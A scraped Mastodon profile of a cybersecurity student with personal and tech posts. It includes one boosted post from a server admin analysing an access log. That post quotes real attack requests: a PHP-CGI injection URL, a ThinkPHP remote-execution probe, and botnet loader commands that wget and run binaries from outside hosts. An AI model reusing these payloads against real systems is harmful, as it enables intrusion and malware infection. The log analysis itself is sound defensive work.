León Castillejos @L1Cafe@social.privacytools.io
- Keybase
- l1cafe
- 🏠 Homepage
- https://L1Cafe.blog
- 💬 Languages
- 🇪🇸 🇬🇧
- 📍 Location
- 🇪🇺 EU Soutwest
- 💸 Donations
- https://L1Cafe.blog/donate/
#ComputerScience & #Engineering student, #cybersecurity enthusiast, #privacy advocate.
I blog about CTFs and system administration. Sometimes a bit of reverse engineering as well.
Posts are my own and do not represent the views of my employer.
Joined Apr 2019
Pinned toot
Ever since I was 7 years old, I've been interested in computers, the Internet, and more recently, cybersecurity and social engineering.
I strive to become an excellent cybersecurity engineer. I'm always eager to learn and love meeting new people with similar interests. Feel free to drop me a DM!
For more information, please check out my personal blog: https://L1Cafe.blog.
Pinned toot
Friendly reminder: #BOINC is a great project to contribute your otherwise idle computing power.
You can set complex scheduling options, either by time of day, battery level, non-BOINC CPU usage, mouse and keyboard activity and so on. This way, it won't take up all your resources when you're compiling or playing videogames.
You can also configure it to only take a percentage of the CPU, a specific core count, or only allow it to run in bursts.
Contribute today!
Crossposted from Twitter
First post on my experience interviewing for Amazon Web Services! More coming soon https://l1cafe.blog/2020/01/27/aws-part1.html
Please, let me know your thoughts.
Crossposted from Twitter
Dia duit Baile Átha Cliath!
Hello Dublin!
Did you know the official name for Dublin in irish means "Town of the hurdled ford"?
Does your city have such a beautiful official name? I don't think so! ❤️🇮🇪
Crossposted from Twitter
Important - cPanel is having issues with MariaDB 10.3.26. Do NOT upgrade MariaDB or your sites will go down. We are currently looking into this.
I tried Rust, but in my opinion, Rust makes it too difficult to write software as it enforces safety above everything else, and it adds cognitive overhead to the task of software engineering.
Writing Go I found myself to enjoy the process of software development. I thought I didn't like software engineering because I was so used to C, Java, Python and Ruby, but Go is just fantastic.
After a while trying Go out, I must say I'm very impressed with the language overall.
It retains many things from C syntax, while supercharging it to make it ridiculously easy to write high-level code that's also efficient. But you can dig deep if you want and go a little lower-level. Docs are well written and maintained. Unlike Ruby or Python, the syntax is never ambiguous.
What I dislike the most is how strict the Go linter is. I really dislike K&R braces.
What are your thoughts on Go?
Crossposted from Twitter
RT @OperadorNuclear@twitter.com
@as_informatico@twitter.com Las mías son azules. 😎
🐦🔗: https://twitter.com/OperadorNuclear/status/1321083402574090240
Crossposted from Twitter
I am committed to solving at least one programming exercise every day. I know my programming skills are far from remarkable, and this will change today.
Follow me on #CodeWars! https://buff.ly/3kbHi5V
Let me know your username and let's battle! ⚔️
I am thrilled to announce I have accepted the employment offer from cPanel, and I will be joining their talented team next Tuesday!
After more than 2 months looking for different openings in multiple companies, I have finally decided to settle on cPanel as I am convinced I will be a valuable part of the team, and I'll be able to learn and grow with my team.
Crossposted from Twitter
☸️ "What we think, we become"
- Buddha
I just got a much needed haircut. Turns out I wasn't going blind!
If you know something would make someone's day, and you know it's true, why not say it?
If you like the country someone comes from, or if you like what someone cooked, just say it.
We always like hearing sincere compliments, so why not take the first step? 👍
Does anyone know of an European IT company hiring English speakers? I am willing to learn the local language, but I will probably not have full proficiency on day one.
I'm thinking Ireland, Switzerland, Germany, Norway, Finland, although I can also consider Canada, New Zealand, Australia and other countries outside of Europe.
Please, contact me or let me know where I can apply!
I'm now on FreeNode with the nick L1Cafe. Recommend me techy channels to join! :D
León Castillejos
boosted
fediadmin, security, long
Did not clear my access log for some time, amassing over 300MBs.
What I looked at
Common attack patterns (SQLi, BOF, path traversal etc.)
Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)
Bad and unusual HTTP status codes
POST requests against unusual places (no inbox, push)
Findings
One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168
241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells
53 IPs did enumeration only, looking exploitable services and shells
Most popular was checking for Wordpress, phpMyAdmin and looking for existing shells
The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249
Details
Top attackers
211.21.226[.]123 Taiwan 122.14.213[.]79 China 113.53.230[.]34 Thailand 150.109.78[.]53 Singapore 118.25.38[.]1 China 118.25.111[.]38 China 106.12.40[.]125 China 103.45.99[.]20 China 47.199.217[.]59 US
The longest attack URL, used by many Chinese attackers
"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"
This URL decodes to:
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
I’d rather not Think PHP, thanks
"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"
Ask and thou shalt receive. 16 attackers asked for a shell.
GET /shell.php HTTP/1.1
Kinda cute
"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-" "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"
Top unusal request lines
24 "https[:]//volcable.ru/" 21 "https[:]//jyvopys.com/" 18 "https[:]//vulkan-platinym24.ru/" 18 "https[:]//sexjk.com/" 18 "https[:]//glassdeskguide.com/" 18 "https[:]//dezgorkontrol.ru/" 18 "https[:]//brendof-club.com/" 18 "https[:]//arabic-poetry.com/" 18 "http[:]//hacron.ru/" 15 "https[:]//se.painting-planet.com/" 15 "https[:]//landofgames.ru/"
Does anyone know why I can reach reserved IPv4 address spaces like 10.200.0.0/16 from my OVH server?
OK, WireGuard time. First time using it, wish me luck. 
- Keybase
- l1cafe
- 🏠 Homepage
- https://L1Cafe.blog
- 💬 Languages
- 🇪🇸 🇬🇧
- 📍 Location
- 🇪🇺 EU Soutwest
- 💸 Donations
- https://L1Cafe.blog/donate/
#ComputerScience & #Engineering student, #cybersecurity enthusiast, #privacy advocate.
I blog about CTFs and system administration. Sometimes a bit of reverse engineering as well.
Posts are my own and do not represent the views of my employer.
Joined Apr 2019
León Castillejos's choices:
